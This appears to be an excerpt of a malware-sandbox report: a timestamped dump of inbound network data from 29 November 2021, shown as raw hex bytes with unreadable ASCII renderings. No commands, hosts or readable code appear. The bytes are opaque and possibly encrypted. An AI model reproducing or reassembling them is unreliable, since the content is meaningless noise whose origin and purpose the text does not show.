                                              2021-11-29 13:25:46 UTC55INData Raw: 3a 7d 3f e0 3e c4 42 5d f9 c4 da 2d 45 04 f3 64 da 63 dd 33 7d 19 2e 31 82 60 66 36 e6 8c ab a5 ab 9d 5c 92 a3 90 59 97 af f1 27 2d 35 2b ec 12 a5 47 ac 58 46 0c 1e 44 ca 04 5f 13 c1 1c 64 7e 5c a1 9a 8a 55 d8 c9 99 28 3b 2b 52 0a 0b be 27 55 2d 3b 6f 45 35 eb ec 12 f7 19 38 f3 ea a4 6f 5d 61 d3 95 63 85 3b 2b 00 64 7d 01 93 1e a8 6c 9c 1a cc c1 a4 99 54 54 f2 84 a2 a8 3f f4 78 30 d8 70 25 6e 95 1b 53 b2 56 83 73 cf bd b5 ac 68 ad d7 57 dc c9 b4 3d 1f 39 9d c1 b5 92 99 de f6 b2 7a 2f 86 63 d4 00 bb 3a b2 c0 4c b0 85 8c 16 da 80 32 dd 24 c9 3b c9 f0 9c 4c 05 a9 7a 0f ba 20 07 ca 24 85 db 7f 40 f4 c9 97 2e 9d 6d e5 11 3d aa 55 0a 14 fa 80 66 73 34 4d d8 a8 e0 94 3f 83 68 99 d5 36 44 9f cb af a9 2a f9 3d 6b ec b8 11 21 bd 51 20 b6 e9 82 a8 45 53 08 22 03 9e
                                              Data Ascii: :}?>B]-Edc3}.1`f6\Y'-5+GXFD_d~\U(;+R'U-;oE58o]ac;+d}lTT?x0p%nSVshW=9z/c:L2$;Lz $@.m=Ufs4M?h6D*=k!Q ES"
                                              2021-11-29 13:25:46 UTC56INData Raw: fa c4 8b 33 b9 49 29 ef c3 91 a9 4e 43 fe 7e c1 b0 df 22 5f cd 53 37 1a 7e 85 03 b0 22 3f cc fc 41 c8 53 69 f5 1a 47 75 f1 37 dd e1 26 f7 85 ea 07 ac 30 2d 08 3e ea 65 b1 e8 08 7c 22 4f b9 fd 2b 76 8f c7 d4 b7 17 da fa 74 48 07 3f cf 1d 9d 0e 1c cf d8 10 00 2c e8 77 18 ac 1e e3 59 41 39 a4 05 1d 60 dc 15 dc 56 01 e2 e2 b6 8d e9 ac e9 c3 b9 5e 56 45 00 68 fc 12 c8 cf 13 e0 7b 79 e3 a9 f9 57 4c 59 58 9c 68 fc 8f 37 65 fe 70 1d 5b d4 0c 75 b8 78 39 b4 e8 59 1c 93 a0 88 dd 4c e9 09 87 77 ee d3 5c c7 11 73 34 86 23 bf 98 3b 3e 87 99 23 52 b0 16 cc 8e cc 7d e3 fc 11 c3 9b cd 84 0a 2f df 1a ed fd 98 63 5d 58 b0 7a b3 30 9f 41 27 f2 d1 f8 ad 4b b0 3e 73 01 d5 ee 56 fc 64 d4 51 c9 26 49 71 55 b6 47 50 f5 d9 5b 5e 3d 75 63 ff 5a e8 2e ad 87 93 0c 03 25 c5 b6 b2 e9
                                              Data Ascii: 3I)NC~"_S7~"?ASiGu7&0->e|"O+vtH?,wYA9`V^VEh{yWLYXh7ep[ux9YLw\s4#;>#R}/c]Xz0A'K>sVdQ&IqUGP[^=ucZ.%
                                              2021-11-29 13:25:46 UTC58INData Raw: 40 cf ef 62 8f 2d 1c fb 76 6f 0b aa 2b b4 92 97 25 c3 ae 32 b1 65 5e e1 8b 92 b0 5e 4e 69 22 cd 58 06 b2 b9 16 42 ab 42 ae 40 e9 bf b3 a7 7e a1 27 46 dc de 8e c6 00 c7 9a c5 f1 83 93 ce 7f 9e cc 05 60 66 c2 2e bd dd b1 ca 5c d8 e8 8d 16 dc 8c 29 c7 1e 21 29 db e9 93 5b 07 85 70 36 ea 31 09 42 80 bf 5a 48 74 e3 db 91 17 92 76 fc e9 14 db 5c 32 1b e8 87 6f 44 30 5a ca ae d9 99 24 90 90 b0 a4 3f 55 93 d0 24 ad 1d c3 2c 79 ea bf 2b 10 b2 af 2b 8c ce e9 1d 99 ae f7 3b 00 84 c3 9d 6f 3c 1d eb 0c 6b 94 eb 56 4f ca 07 a6 5c c0 7a af 40 e8 42 29 72 73 ff c3 d8 4c 6e 59 de ca e0 da 60 20 ae de 4e b2 e0 d8 56 b3 3a 5d 5f 77 20 f1 a4 a1 59 1f c1 ee 16 d7 98 b1 4c 35 34 0b f0 83 15 4d 6b af bf 16 1e 53 a4 98 c9 a8 f4 ec 3e b3 22 2f 24 31 e9 df 90 4e 48 bb 85 9a b9 51
                                              Data Ascii: @b-vo+%2e^^Ni"XBB@~'F`f.\)!)[p61BZHtv\2oD0Z$?U$,y++;o<kVO\z@B)rsLnY` NV:]_w YL54MkS>"/$1NHQ
                                              2021-11-29 13:25:46 UTC59INData Raw: d3 06 7b c9 c6 17 d1 2f f2 f5 61 b5 ee b5 f6 c6 bd 61 23 df 6f ab d4 03 c2 d7 c3 9c 93 68 e7 8b 76 51 3f 71 45 8c 46 06 9f 26 6a 80 bf c7 4c 04 09 6b 87 6e 00 20 87 71 14 8c b6 b1 25 5c ef 6c 75 6a d7 88 97 c5 05 7e 4a a5 09 55 9f 2a 25 23 ca 27 52 b7 51 d5 8d cc 71 e9 fc 06 bb 55 df 82 11 38 de 04 05 d0 77 8d b2 41 8f d8 ae cf 6a b4 e8 e9 ee 19 be 42 ab 1f 4c 10 eb 4b a1 2b a3 0a 44 e6 d0 7e 77 7f bc 54 03 9a 63 5b 5e 37 78 4b c7 5a e8 24 09 84 95 26 70 0e c5 f7 bc e9 0c 37 c3 06 82 b0 63 c3 0a 1a 76 44 bc f1 63 3a 4c 30 eb f3 a2 fe 47 c7 b7 19 59 b5 56 46 ce cf 2a fa 81 5c f8 fa 05 29 91 5a 34 76 09 d3 8b 17 b5 ba 67 1f 8c 39 04 74 c4 a9 6c b3 b2 1d c4 e8 e9 39 14 02 2b 73 dd aa 12 45 71 f8 d9 86 e9 eb f4 b2 a1 f8 25 99 af 4e eb eb fb 6c d5 46 9c 80 3d
                                              Data Ascii: {/aa#ohvQ?qEF&jLkn q%\luj~JU*%#'RQqU8wAjBLK+D~wTc[^7xKZ$&p7cvDc:L0GYVF*\)Z4vg9tl9+sEq%NlF=
                                              2021-11-29 13:25:46 UTC60INData Raw: 6c d2 b3 53 66 62 ee f3 d5 3b 8f 74 d4 c1 3e 86 5a 1a f8 fa 80 6c 44 b2 5e ca a2 e2 80 29 b8 01 9b f9 39 7d bb de 35 a3 1d 08 2f 79 e6 81 9f 3e b2 a5 32 9e e6 92 9e b8 ac f1 15 3d 8f d2 92 56 dd 34 0e 05 43 0e fa 50 6d fe 00 a0 7e 38 51 ad 46 c6 7d 22 63 7d b8 02 db 4c 62 60 4b db e7 bf 55 27 bf de 77 95 ca f8 54 a5 14 1c 75 75 2a e1 5c b1 41 77 f1 c1 14 dd 40 a8 41 33 03 0b fa 9f f8 46 1c bb b8 02 18 50 03 46 dc 8d cd dd 16 9d 2a 3c 29 54 7b f1 90 44 49 85 93 da ca 79 1b ec d2 09 1b 02 15 15 fc a9 0c 86 aa 5d ea cf ea c0 d5 bc 47 91 da 9b ad 19 44 9d 72 51 7b 1f 37 a8 b4 0d 3c 5a 4f d5 cb 41 6f 7d ca 04 46 93 a5 a9 7a 35 51 1d ae 12 3d 0b bb 38 f1 d7 4d f9 d0 d0 f3 b6 ca 0e a0 f9 97 d0 b7 e7 89 4b e1 a8 e1 7e e5 4a d5 1d 22 18 06 c9 30 7c c8 01 ea 2e d2
                                              Data Ascii: lSfb;t>ZlD^)9}5/y>2=V4CPm~8QF}"c}Lb`KU'wTuu*\Aw@A3FPF*<)T{DIy]GDrQ{7<ZOAo}Fz5Q=8MK~J"0|.
                                              2021-11-29 13:25:46 UTC61INData Raw: 34 d8 f3 39 e9 e7 bb 4d 49 ad 53 50 cd 3f 92 02 88 e4 2c be 44 b2 3a 73 1f e3 22 83 01 9b 0c 55 e1 1f 7a 1e 71 be 54 44 97 6e 5c 31 11 7a 4b c1 4b e5 0c 3a 81 95 20 65 25 c7 f7 a8 ef 1d 3a b6 1e 83 b1 72 2d 18 3f 58 72 bc f1 17 29 42 52 53 f9 a0 e2 25 0e 8e 19 53 a0 d7 4c d7 dc 2a 43 9a 4c e9 e1 1e 3d 37 71 0b ae fd 04 12 07 b3 a7 bc 7f ac 29 02 6f c7 91 f6 4b 59 ca 32 f9 cc 17 34 8f 2c 79 ce a4 72 f7 60 f0 c5 f5 a5 d3 f4 b6 09 37 2f 8b 91 6f 08 ea fb 27 f0 40 88 a8 14 63 67 ed 2b ef f6 84 21 f2 d5 35 2a 3a 45 28 ee dc 63 31 72 50 a8 3f c4 48 4e a2 db d7 3e d0 05 e2 76 1c 46 23 32 44 09 3f 39 b0 62 62 37 f3 d3 82 a7 5c 9b 43 b7 34 82 59 97 ab fd 34 eb fe 07 fa 03 af 40 30 6b 2f 0e 32 4e cd 28 1e da c1 16 78 5e 02 a2 9f 9f 47 c9 de 95 c9 31 f9 4e 21 08 87
                                              Data Ascii: 49MISP?,D:s"UzqTDn\1zKK: e%:r-?Xr)BRS%SL*CL=7q)oKY24,yr`7/o'@cg+!5*:E(c1rP?HN>vF#2D?9bb7\C4Y4@0k/2N(x^G1N!
                                              2021-11-29 13:25:46 UTC63INData Raw: 25 b7 f8 9b bb c8 f8 ce a2 3b 28 6a 4c bc e6 a5 ab 70 f6 d9 ef 16 41 57 b9 75 3d d8 0b f0 89 9a 56 44 8a 9f 84 14 8d a4 da cd 8a c2 c4 4f 2f 39 3b 30 4b 73 7c 90 44 43 0f ac 9d a6 51 39 55 d4 1a 13 8f 0c 3a b4 a0 2c 66 c5 75 e8 53 fd d6 c2 a1 5e ad 62 88 aa 00 58 8a 19 c9 42 1a 29 a6 92 f7 1a 58 4f 4f cb 4e 58 31 d1 78 dc ed 88 b4 6a 25 ca 1d a1 62 34 1c 27 23 28 9d 2c cd 4e c1 f2 ba d0 09 35 c0 c7 cd a3 f7 7a 72 e4 b7 f2 79 70 4a d5 6d 10 3a f9 cf 21 75 45 15 c5 33 c4 da d3 9c 92 6b e9 a5 8d e4 26 96 aa 99 f7 19 31 44 3c fb 59 bc 20 ab d5 3e 87 3f 8b bf d8 44 07 63 82 8a 5b 22 53 c3 5e 8d 8c 6f 8e 12 3c a9 57 1a e2 61 42 4b b3 9a 69 56 72 e4 24 da 76 26 e0 00 e2 2d 57 30 2b 67 5e fb 62 a4 d8 15 f1 23 5f 70 45 15 e1 9a c0 cd fb fd 46 eb 79 08 0f 6a 5e 16
                                              Data Ascii: %;(jLpAWu=VDO/9;0Ks|DCQ9U:,fuS^bXB)XOONX1xj%b4'#(,N5zrypJm:!uE3k&1D<Y >?Dc["S^o<WaBKiVr$v&-W0+g^b#_pEFyj^
                                              2021-11-29 13:25:46 UTC64INData Raw: 5a e1 16 38 c7 fa 34 76 09 d3 ba 12 b5 b6 05 dc ab 38 0e dc c6 b6 65 cb 9a 35 ec e6 c1 67 07 8f 2a 1c 6d aa 01 47 c2 e1 d6 e1 f3 d7 f4 b6 09 c1 74 89 bb 60 4d 5a fa 66 ce e2 99 b1 18 6b 74 39 3d fc e6 61 ff f0 d5 97 3a 2b 54 2d 74 d1 6a 12 be 52 a9 3f cd 27 ff f1 db dd 2d 44 12 f1 64 fd f6 21 32 51 18 2c 28 b8 f8 71 32 e9 f2 85 c8 1b 9a 43 bd a3 87 2a e7 bc ee 38 c0 32 16 ff 2b f5 55 36 76 be bd 1f 42 d6 38 8f 12 d7 e8 73 5c 02 96 d7 9d 47 de b7 39 36 30 df 47 d8 01 b9 d7 45 31 a4 54 1e 2e e7 f9 6f 45 09 2a e6 e5 a4 6f 67 96 ea 8f 73 80 13 69 18 77 69 6e 30 0d b4 98 89 c8 c7 a9 c9 98 34 4f e4 a9 e1 bf 2d f2 06 90 c6 53 d1 7b 47 17 54 44 46 e6 43 d0 a9 b7 aa 77 fa e6 47 dc de b5 28 19 4a 89 ed ac 82 80 d2 7d 80 d3 05 dd 61 c2 2e 37 2b a8 dd 72 ac b1 8d 10
                                              Data Ascii: Z84v8e5g*mGt`MZfkt9=a:+T-tjR?'-Dd!2Q,(q2C*82+U6vB8s\G960GE1T.oE*ogsiwin04O-S{GTDFCwG(J}a.7+r
                                              2021-11-29 13:25:46 UTC65INData Raw: 1c 58 4f da 54 fe 4f b0 79 d2 57 26 98 7d f7 26 56 0c a7 6e 21 03 35 85 39 b3 15 cd db 5e 42 b2 19 0c b7 c2 ca f9 ae f0 e2 72 e9 a1 f6 65 76 73 bb 76 06 1c 2e eb 21 75 d3 a6 d3 26 c4 1a 5c 87 84 7e e0 ad 20 14 29 07 04 af 46 2e 27 57 ab e3 d0 14 2b b9 c7 98 97 fa 83 b6 57 59 2b 63 8f 98 d6 3f 5c cd 48 37 24 05 8a 12 a6 90 74 05 fc 4b 60 5a b8 8d 23 54 7e ea 37 db 3c 24 eb 0e ce 1c b7 01 f0 14 2d eb 65 b1 ea 0a 7c 36 4b 4e 71 10 5d b3 75 d7 d8 eb cb db 6f 37 b1 59 cb 07 99 07 91 c0 ba eb 10 3c 78 0b c0 bd 0f fd 66 1a 54 4b 03 0b e7 c8 10 cd 5c 04 e6 e1 48 b4 ff bd e8 fa f3 49 80 d5 e3 9e fc 12 c3 c4 db 9e 86 6e 6f 9c ea 51 3e 53 e9 9c 6e e5 b6 7c 60 91 b3 0a 8d 53 3d 44 96 68 3b b2 91 62 13 85 b5 8a e4 73 ed 66 a5 66 e1 c3 5e c2 73 54 59 a0 27 ac 8e 3b 3e
                                              Data Ascii: XOTOyW&}&Vn!59^Brevsv.!u&\~ )F.'W+WY+c?\H7$tK`Z#T~7<$-e|6KNq]uo7Y<xfTK\HInoQ>Sn|`S=Dh;bsff^sTY';>
                                              2021-11-29 13:25:46 UTC66INData Raw: e4 7f 22 48 6a 81 e8 f2 23 6c 48 d1 b4 fe b4 46 28 97 1c 5f bb c8 e9 44 ac 35 e4 66 62 31 e3 b4 83 01 61 cf f7 c0 ce 51 95 20 0c 13 18 d7 98 21 56 64 f8 98 14 14 8b b5 48 cb 00 db db 3e b2 3b 1e 3e 60 45 ce 87 c8 7c 93 bd 9b 1b 4a 3b f8 fc b6 13 13 17 15 f1 ab 0c 8a ed 9f e9 cf e6 f9 09 ac 41 f4 d6 bd ad 1f 5f fa 4b 57 53 1b 27 bf a5 b4 09 4f 5e dd cd c4 40 3e ce 05 53 da 9e 8d 6c 22 41 80 99 7d 25 0b 19 23 09 96 16 77 d2 d0 ff ba e3 93 96 d1 c0 d3 a1 c9 5e 63 e3 a2 cb 40 fd 55 c5 ff 01 1a 06 ce 32 56 c8 27 d4 3d c4 40 70 8d 95 75 53 a2 32 e1 09 25 b3 b9 7d 06 4e c8 9f ea 5e a2 2c 95 bb 2e 80 2a aa f5 bb aa ff 6b 8d 8f d6 24 47 ca 7b 28 0e 6f 8e 03 af 90 1e 01 fc 47 ad 52 b2 9a ff 6a 64 ea 34 e4 ba 33 e7 19 ad 14 a9 30 21 5e 06 ea 65 bb e8 15 72 3b 8e 7c
                                              Data Ascii: "Hj#lHF(_D5fb1aQ !VdH>;>`E|J;A_KWS'O^@>Sl"A}%#w^c@U2V'=@puS2%}N^,.*k$G{(oGRjd430!^er;|
                                              2021-11-29 13:25:46 UTC67INData Raw: a8 fe 39 2a a0 11 dd 1d 21 64 c7 cd 37 9d 9f 4c f4 f8 81 98 b1 48 83 5e 12 fa ed 1c a1 bc 7b 60 a6 2c 17 72 de 21 ca bd 28 82 dc 28 e0 b1 b4 98 f6 64 0b 26 3e 4d 60 f1 dc fd 9a e2 7a 01 14 33 3e 9c a8 6b 09 f2 ea 63 d5 4d 9f 72 1d 72 6a bc 23 fe fb 4e fb 66 b4 09 3a 37 52 eb fd d1 72 26 63 41 98 dd d5 4d c0 47 cc 0d 29 81 89 dd 76 c5 46 30 34 47 18 3a b7 1d 7a b8 25 f2 f0 8f 8c f9 8a 46 a6 be 16 48 82 ac e0 a6 09 22 28 e2 12 a9 40 38 61 d4 1e 10 d6 fc d3 71 13 c1 c0 63 49 16 b0 18 43 d9 f3 c8 9a 31 21 db 42 23 11 a1 bd 55 24 b0 72 d6 f0 79 f9 11 f1 19 24 78 d9 b0 6f 71 62 c3 3b 63 85 31 1c 38 77 6f 0b 88 1d ba 85 4b 25 c8 ae 39 88 46 6f 49 5f b0 9e 05 c3 69 22 cd 40 d4 47 81 16 42 b0 99 86 1a c3 bf f4 b6 77 89 c4 45 dc d8 a0 22 03 c7 8c ef ac 83 85 ca 6c
                                              Data Ascii: 9*!d7LH^{`,r!((d&>M`z3>kcMrrj#Nf:7Rr&cAMG)vF04G:z%FH"(@8aqcIC1!B#U$ry$xoqb;c18woK%9FoI_i"@GBwE"l
                                              2021-11-29 13:25:46 UTC68INData Raw: 26 fe fe 9d 23 a8 83 97 ed e2 7b 0c 37 a8 b8 73 1c 49 47 bc f8 48 47 34 dd 00 33 da 8e ab 70 20 5f 1d af 6a 4a 23 ba 32 25 93 37 cc bd fa f4 a5 c9 00 b1 5c eb d2 b7 e0 f5 69 fd 25 cc 6f ec 5a c1 77 0f 0b 0c c6 af c2 f1 24 c3 2c d9 dd 4b 9b 84 7e f8 3d a6 eb 09 98 b2 b9 7d 08 35 5a b1 ef 48 bd 12 ac 48 2f 8a 31 99 b8 4e 3a 27 7d 9e 96 d6 3a 45 d9 2c 85 0d 6f 84 03 a9 d7 7b 04 fc 4b c9 4c b0 8c f6 c9 c2 94 17 cd ea 3d f4 18 ea 1e a9 30 21 76 c5 85 73 ba f9 09 61 3a 52 b1 72 26 55 bc c7 d2 d2 f8 d1 d2 50 15 2b 4c d4 3e b4 1e 86 d3 17 1b 17 16 72 18 90 b0 1e e9 4e 9b 56 4b 05 1d 6a cf 27 cc 5d 10 c5 f4 60 17 ea bd e2 d2 b3 49 80 de 74 91 fa 12 a3 d7 c9 8f 04 79 e3 b2 99 30 3e 7b 50 91 67 80 6b 27 60 9b aa 1b 59 f6 70 45 96 63 3b b9 96 77 0f 96 b0 88 c9 d3 58
                                              Data Ascii: &#{7sIGHG43p _jJ#2%7\i%oZw$,K~=}5ZHH/1N:'}:E,o{KL=0!vsa:Rr&UP+L>rNVKj']`Ity0>{Pgk'`YpEc;wX
                                              2021-11-29 13:25:46 UTC70INData Raw: 4b 99 37 c4 6a 4b f0 db 42 3e 57 15 91 cc c5 47 29 38 22 f2 3e 39 a0 6e 6a 1e 9d e7 81 a1 83 e5 47 b7 b6 aa ce 85 bd e8 41 2f 35 07 f0 6c 52 50 36 7a d9 27 61 46 dc 2a 59 93 c5 16 74 65 90 bd 8c 9f 34 24 d9 8b 3d 5f 28 52 26 0a a7 01 39 24 a1 7a 6a ab e3 ff 06 df 9f 29 ec f7 29 92 70 68 e1 80 9f 84 3b 3e 14 5f 10 05 82 0a 9c 10 99 36 c0 97 a0 9a 54 58 92 7d be bb 27 9b 94 23 c7 59 d3 47 3a 12 42 bc 6f 02 18 e9 b9 9d 3d 74 89 c2 36 20 d9 a6 28 6c 3a 9d ed a6 8b bb 4b 68 9a c3 05 02 61 c2 2e bd bf b6 ca 5c 83 49 8c 16 d0 f0 d2 cf 36 c3 22 f3 69 bf b2 02 ad f2 1a b7 37 21 c3 97 b7 55 13 94 e6 db 9d 50 72 73 fc e5 34 ae d4 36 1d fd a8 ef 68 2e 58 e2 3f f2 86 26 e3 6a 99 f9 35 3a 68 dd 35 af 23 e5 41 87 ed a9 09 29 68 bc 33 89 e4 82 49 ba ac f7 43 ec 8c d2 9e
                                              Data Ascii: K7jKB>WG)8">9njGA/5lRP6z'aF*Yte4$=_(R&9$zj))ph;>_6TX}'#YG:Bo=t6 (l:Kha.\I6"i7!UPrs46h.X?&j5:h5#A)h3IC
                                              2021-11-29 13:25:46 UTC71INData Raw: 9c 87 43 b6 d0 91 2a 87 7f 57 5f 11 76 8f 8f f9 6d aa 23 bc ab 26 6f 8e 13 b0 b8 50 05 fc 74 c3 85 b0 98 f9 5d 75 fb 3a df da 31 e7 30 c0 0d a8 a6 2b 67 d3 fc 76 b3 c1 16 6f 32 58 6f 76 0b 62 9f 39 d3 f4 e0 d2 ed 11 3d 2a 4a d4 09 99 0d 8e d9 d8 13 0e 37 8c 19 fd ab 0f ee 43 84 5a 58 0d 1d 7b c7 0c 33 5c 3c fa e4 67 0e e3 21 ff c1 a1 49 91 d7 76 5f fd 3e cb c6 ce 99 8b 6e 7f b9 f9 59 3f 6a 52 83 63 11 9f 0a 6c 8f 34 36 5b de 17 57 92 76 26 af 8f 71 0f 9b b1 67 cd 71 ec 7e b0 7d ee c4 45 c9 11 88 5a 8c 2d ae 98 37 11 9e 94 27 52 a9 6b f5 84 cc 6a ed f2 16 52 82 e0 89 08 37 db 62 3f ec 88 78 47 56 b0 57 a6 cf 71 b6 29 f2 38 2f 92 48 b0 30 7e 0d b3 d1 b4 09 88 02 44 fd 06 61 66 ab bd 78 51 80 61 4d 5c b9 cf 5a c2 4c 87 21 71 85 9f 00 15 17 d6 ff ae f8 04 28
                                              Data Ascii: C*W_vm#&oPt]u:10+gvo2Xovb9=*J7CZX{3\<g!Iv_>nY?jRcl46[Wv&qgq~}EZ-7'RkjR7b?xGVWq)8/H0~DafxQaM\ZL!q(
                                              2021-11-29 13:25:46 UTC72INData Raw: 62 63 85 3d 27 18 66 6b 29 d6 08 b4 94 f2 b1 c7 bf 31 b4 53 58 ec 5c c2 ba 2d f4 7f 33 c3 3c 53 6e b9 10 55 60 54 89 0f ec 87 f9 ab 77 89 d5 41 cd dd b0 4d 8a c6 9c eb bf 85 bb 8f 6d 9a cf 3c 82 74 c7 3f fa b3 b3 ca 5c 9f 2d 8d 16 d0 8c 28 c6 1e d7 29 db e9 aa b4 2c a2 76 1e bd 19 26 44 93 bd 6a 9c 68 e7 db 86 38 a7 75 fc ef 17 95 54 23 15 c2 6c 66 6c 2e 4f c2 bc d9 1e 24 90 90 8e 74 38 55 95 dd 21 b1 21 c5 8d 79 ec a3 17 16 68 ac 21 9c f6 37 69 bb ac f6 29 07 99 fa 37 7e 38 3f 26 93 6b 92 f0 41 63 c5 09 a7 56 a9 41 a4 51 e6 47 08 fb 7f 90 e1 cc c1 6f 48 d7 da f3 a1 52 0a 0d d8 5f b1 dc d0 88 b0 3c 34 63 f8 27 f7 a2 b1 44 64 cd c7 b5 dd 46 b4 41 81 03 0b fa 9a 0d 56 4b 83 97 8e 10 8d a2 50 51 8a dc db 3f a7 3c 28 07 e1 53 df 9a 50 6b 45 be 9a bf 4d 94 eb
                                              Data Ascii: bc='fk)1SX\-3<SnU`TwAMm<t?\-(),v&Djh8uT#lfl.O$t8U!!yh!7i)7~8?&kAcVAQGoHR_<4c'DdFAVKPQ?<(SPkEM
                                              2021-11-29 13:25:46 UTC74INData Raw: 6a 53 01 c3 42 02 ed 8b fc 06 f1 a2 f1 cd f2 d5 91 d1 70 b5 e3 70 5e c6 c7 90 81 66 db 3f fb 5f 20 6d 7a 49 6e ef 9e ba 71 9f a6 0a 7b 25 16 44 96 f5 39 b2 98 69 3e 48 a6 99 cc c1 fe 68 bc 6c f1 b1 d1 c7 0e 69 41 80 87 bf 9e 2a b3 be 9b 38 49 a9 32 7a 9d c2 64 f9 cd d3 ac 83 cc 18 11 30 d0 10 24 b4 14 63 43 56 b9 5f 32 de 6e a1 29 e4 95 b2 af 4c ac 28 72 9f c0 4d ab 02 88 04 55 e2 18 5e e9 55 bc 54 de 97 6d 4c 41 38 e4 5a c9 42 f7 4c ef 94 9b 3f 2a c1 c5 f7 ae 75 1d 39 c3 19 f5 2d 69 fd 16 05 33 d9 ad ff 01 25 00 bd f8 f7 bd f7 6f ba a7 17 4d 8a f0 75 c6 cd a1 84 87 42 f1 d0 e6 2f b9 c6 a8 67 0d e4 e7 09 bb 2c 7b 62 b5 33 24 fc d7 af 7d 29 b7 3b f3 e0 c9 cb 03 8f 2c ef cc a5 1e 40 7f 9b 53 e9 83 f4 fa a9 4f 75 3c 83 a4 69 02 01 fb 66 c4 dc 99 a6 07 66 60
                                              Data Ascii: jSBpp^f?_ mzInq{%D9i>HhliA*8I2zd0$cCV_2n)L(rMU^UTmLA8ZBL?*u9-i3%oMuB/g,{b3$});,@SOu<iff`
                                              2021-11-29 13:25:46 UTC75INData Raw: b6 7f 62 70 ea db 9e 25 71 73 d0 eb 28 ac 47 3f 1d f2 96 98 6d 02 5c dd a5 f1 8f 3c 6e 97 b4 fb 14 57 be 5f 32 8f 35 ed 35 49 e5 a9 f2 3f b2 af 81 9a e0 ab 1d 01 ac f7 37 18 92 ce bc c5 38 35 04 05 6d ba 5b 54 67 eb 2f 18 56 af 58 de 56 ec 53 2a 6e 72 ff f0 d8 4c 62 65 db f3 45 b1 46 24 86 c0 5d bb c2 ff 78 ba 14 91 71 75 26 98 bb b2 50 7a ca e3 00 ce 4d 86 f5 1c 03 0b e1 85 17 4c d9 84 bb 07 10 e2 be 44 dc 87 cf d5 28 a0 25 04 5c 43 53 df 81 4a 52 9e 27 89 bf 4a 1f 83 58 1b 13 19 35 99 af ab 0a a8 7b 75 e8 c5 ff d4 cc a8 69 cf fe 99 a7 26 12 94 63 55 20 ca 37 a8 b8 71 1d 49 48 c7 f2 35 45 3e c8 13 cd fb 8f ab 7b 20 59 1d a9 6b 34 0f 19 23 20 91 2e ca c2 c4 e1 b2 4e 30 a9 d1 c1 c1 a6 f0 f7 75 f4 34 f6 7e fb 73 75 72 06 10 20 de 30 63 49 28 dd 3d c3 da d5
                                              Data Ascii: bp%qs(G?m\<nW_255I?785m[Tg/VXVS*nrLbeEF$]xqu&PzMLD(%\CSJR'JX5{ui&cU 7qIH5E>{ Yk4# .N0u4~sur 0cI(=
                                              2021-11-29 13:25:46 UTC76INData Raw: 0d 3b ee 88 68 57 49 b5 5e ae cf 61 a5 06 ff c6 0d be 42 a1 17 62 12 fa 65 3c 03 9b 00 46 f8 18 56 e3 54 bc 5e 2d 90 62 5b 54 3d a6 47 ef 6d e8 24 79 ad ad 26 0a 05 1b f7 a8 c3 0c 36 c9 06 82 b1 78 f3 0d 0f 65 45 b0 eb 1d 3a 4d 3f eb d1 bc ea 28 2c 9c 0a 63 a9 09 d0 c4 cd 3d 36 89 5d e9 e6 02 17 2e c4 34 76 03 f2 f2 0a 4b b1 46 79 ae 10 38 7b d7 a9 6b 9d 88 35 ec e6 ff 7f 81 8d 2c 73 c2 b6 0c 4d 69 ef c5 06 8c c7 e1 b2 2b de 28 8d bd 70 0a c4 fb 66 ce 56 c8 7b 15 63 67 37 20 e2 f6 50 3e f9 2b 96 07 34 95 27 ee dc 61 03 66 50 a9 35 c8 57 42 fd db de 27 a9 05 ce 78 c6 34 2b 30 51 03 50 30 a8 62 68 3d fa ee 81 ae b4 94 bd b6 9c 8a 61 ac bf ee 32 cc 24 0a fa 0a b1 af 37 5c c3 08 36 74 d9 2c 77 05 e9 38 72 4d 0d a8 bf 03 58 d1 d5 8b 3e 2b 2b 52 0a 11 a8 01 71
                                              Data Ascii: ;hWI^aBbe<FVT^-b[T=Gm$y&6xeE:M?(,c=6].4vKFy8{k5,sMi+(pfV{cg7 P>+4'afP5WB'x4+0QP0bh=a2$7\6t,w8rMX>++Rq
                                              2021-11-29 13:25:46 UTC77INData Raw: cb 6f b9 c8 d0 52 b3 3c 34 75 75 31 e1 a9 9b 4b 70 de f8 e8 dc 6a bc 71 16 03 0c e6 77 07 6b 41 80 b4 16 13 95 5a 47 f0 8f f7 d9 15 50 2a 47 46 42 53 db ba 66 41 90 c0 f3 b9 5b 1d c6 d4 1a 13 00 2d 3f ab 83 0c 80 c5 73 e8 cf fd c7 d6 86 5a fe f9 8e 53 1e 79 97 7b 5e 53 1a 20 56 b3 4e 18 4f 44 d3 dd 51 b9 3f e2 06 6b fe a4 48 78 48 3c 0c a6 79 0f 28 b9 31 52 e8 3e db d6 fa f5 a5 c3 0c 99 d3 c0 fa b7 e1 e6 65 e3 a8 f6 79 e7 70 c9 72 01 0d f8 ce 0d 77 c1 0f c2 2b c5 32 4e a1 97 63 fa b3 16 ed df 88 9f bb 5c 1b 1a a7 a2 91 35 a3 3a b9 63 0d 82 23 ed c2 44 55 04 56 9e 9c c7 20 64 de 43 85 0c 6f 8e b7 a0 b8 41 13 f7 6a d9 4b b4 8d 0b 46 59 f9 23 c7 ea 30 f1 e1 c3 21 aa 27 20 67 c5 f2 9b ba d5 01 46 30 73 8c 65 78 11 8b c7 d6 f2 c9 d8 f9 03 7b 2b 4a da 3c 8c 1e
                                              Data Ascii: oR<4uu1KpjqwkAZGP*GFBSfA[-?sZSy{^S VNODQ?kHxH<y(1R>eyprw+2Nc\5:c#DUV dCoAjKFY#0!' gF0sex{+J<
                                              2021-11-29 13:25:46 UTC79INData Raw: 0b 05 b9 c6 27 46 00 fb 9e 16 b5 b0 6a 6c aa 38 06 56 c0 af 7d bf a5 18 e7 c4 d7 3a 03 89 5f 55 df ab 0b 37 62 83 9e f9 8d ed 9b f5 02 e9 2b 8f b8 4e 60 ef fb 60 ab 68 8a a8 1e 0c 5c 29 2b e9 f4 36 63 f3 d5 91 28 12 7a 38 ee da 0c 03 70 50 a3 50 97 49 4e f6 d9 b8 7c 56 04 e4 75 ed 07 26 32 57 66 17 3b aa 68 0d 63 e1 e3 87 a5 c4 d9 42 b7 b6 81 71 c7 b8 ee 34 bc 1c 05 fa 09 c0 06 37 70 d7 25 00 51 ec 2e 71 3b c1 16 72 45 07 be 9d 8f 4c f3 c3 8b 30 27 2b 52 0a 02 b7 22 44 27 b7 82 43 06 e5 e8 0b f7 0f 32 12 f0 76 6c 5a 6a c0 0c 60 fe 40 34 1c 73 45 23 80 0f c9 e9 9d 36 c2 95 37 99 54 4d d1 83 bf 93 2d f4 69 2a c7 53 ca 79 b2 3d 59 ba 40 91 e2 e8 93 b7 b2 7c 89 c3 53 22 d9 8a 20 14 cc 9c ea b4 7d 92 e4 6e b1 c7 06 65 67 b9 54 95 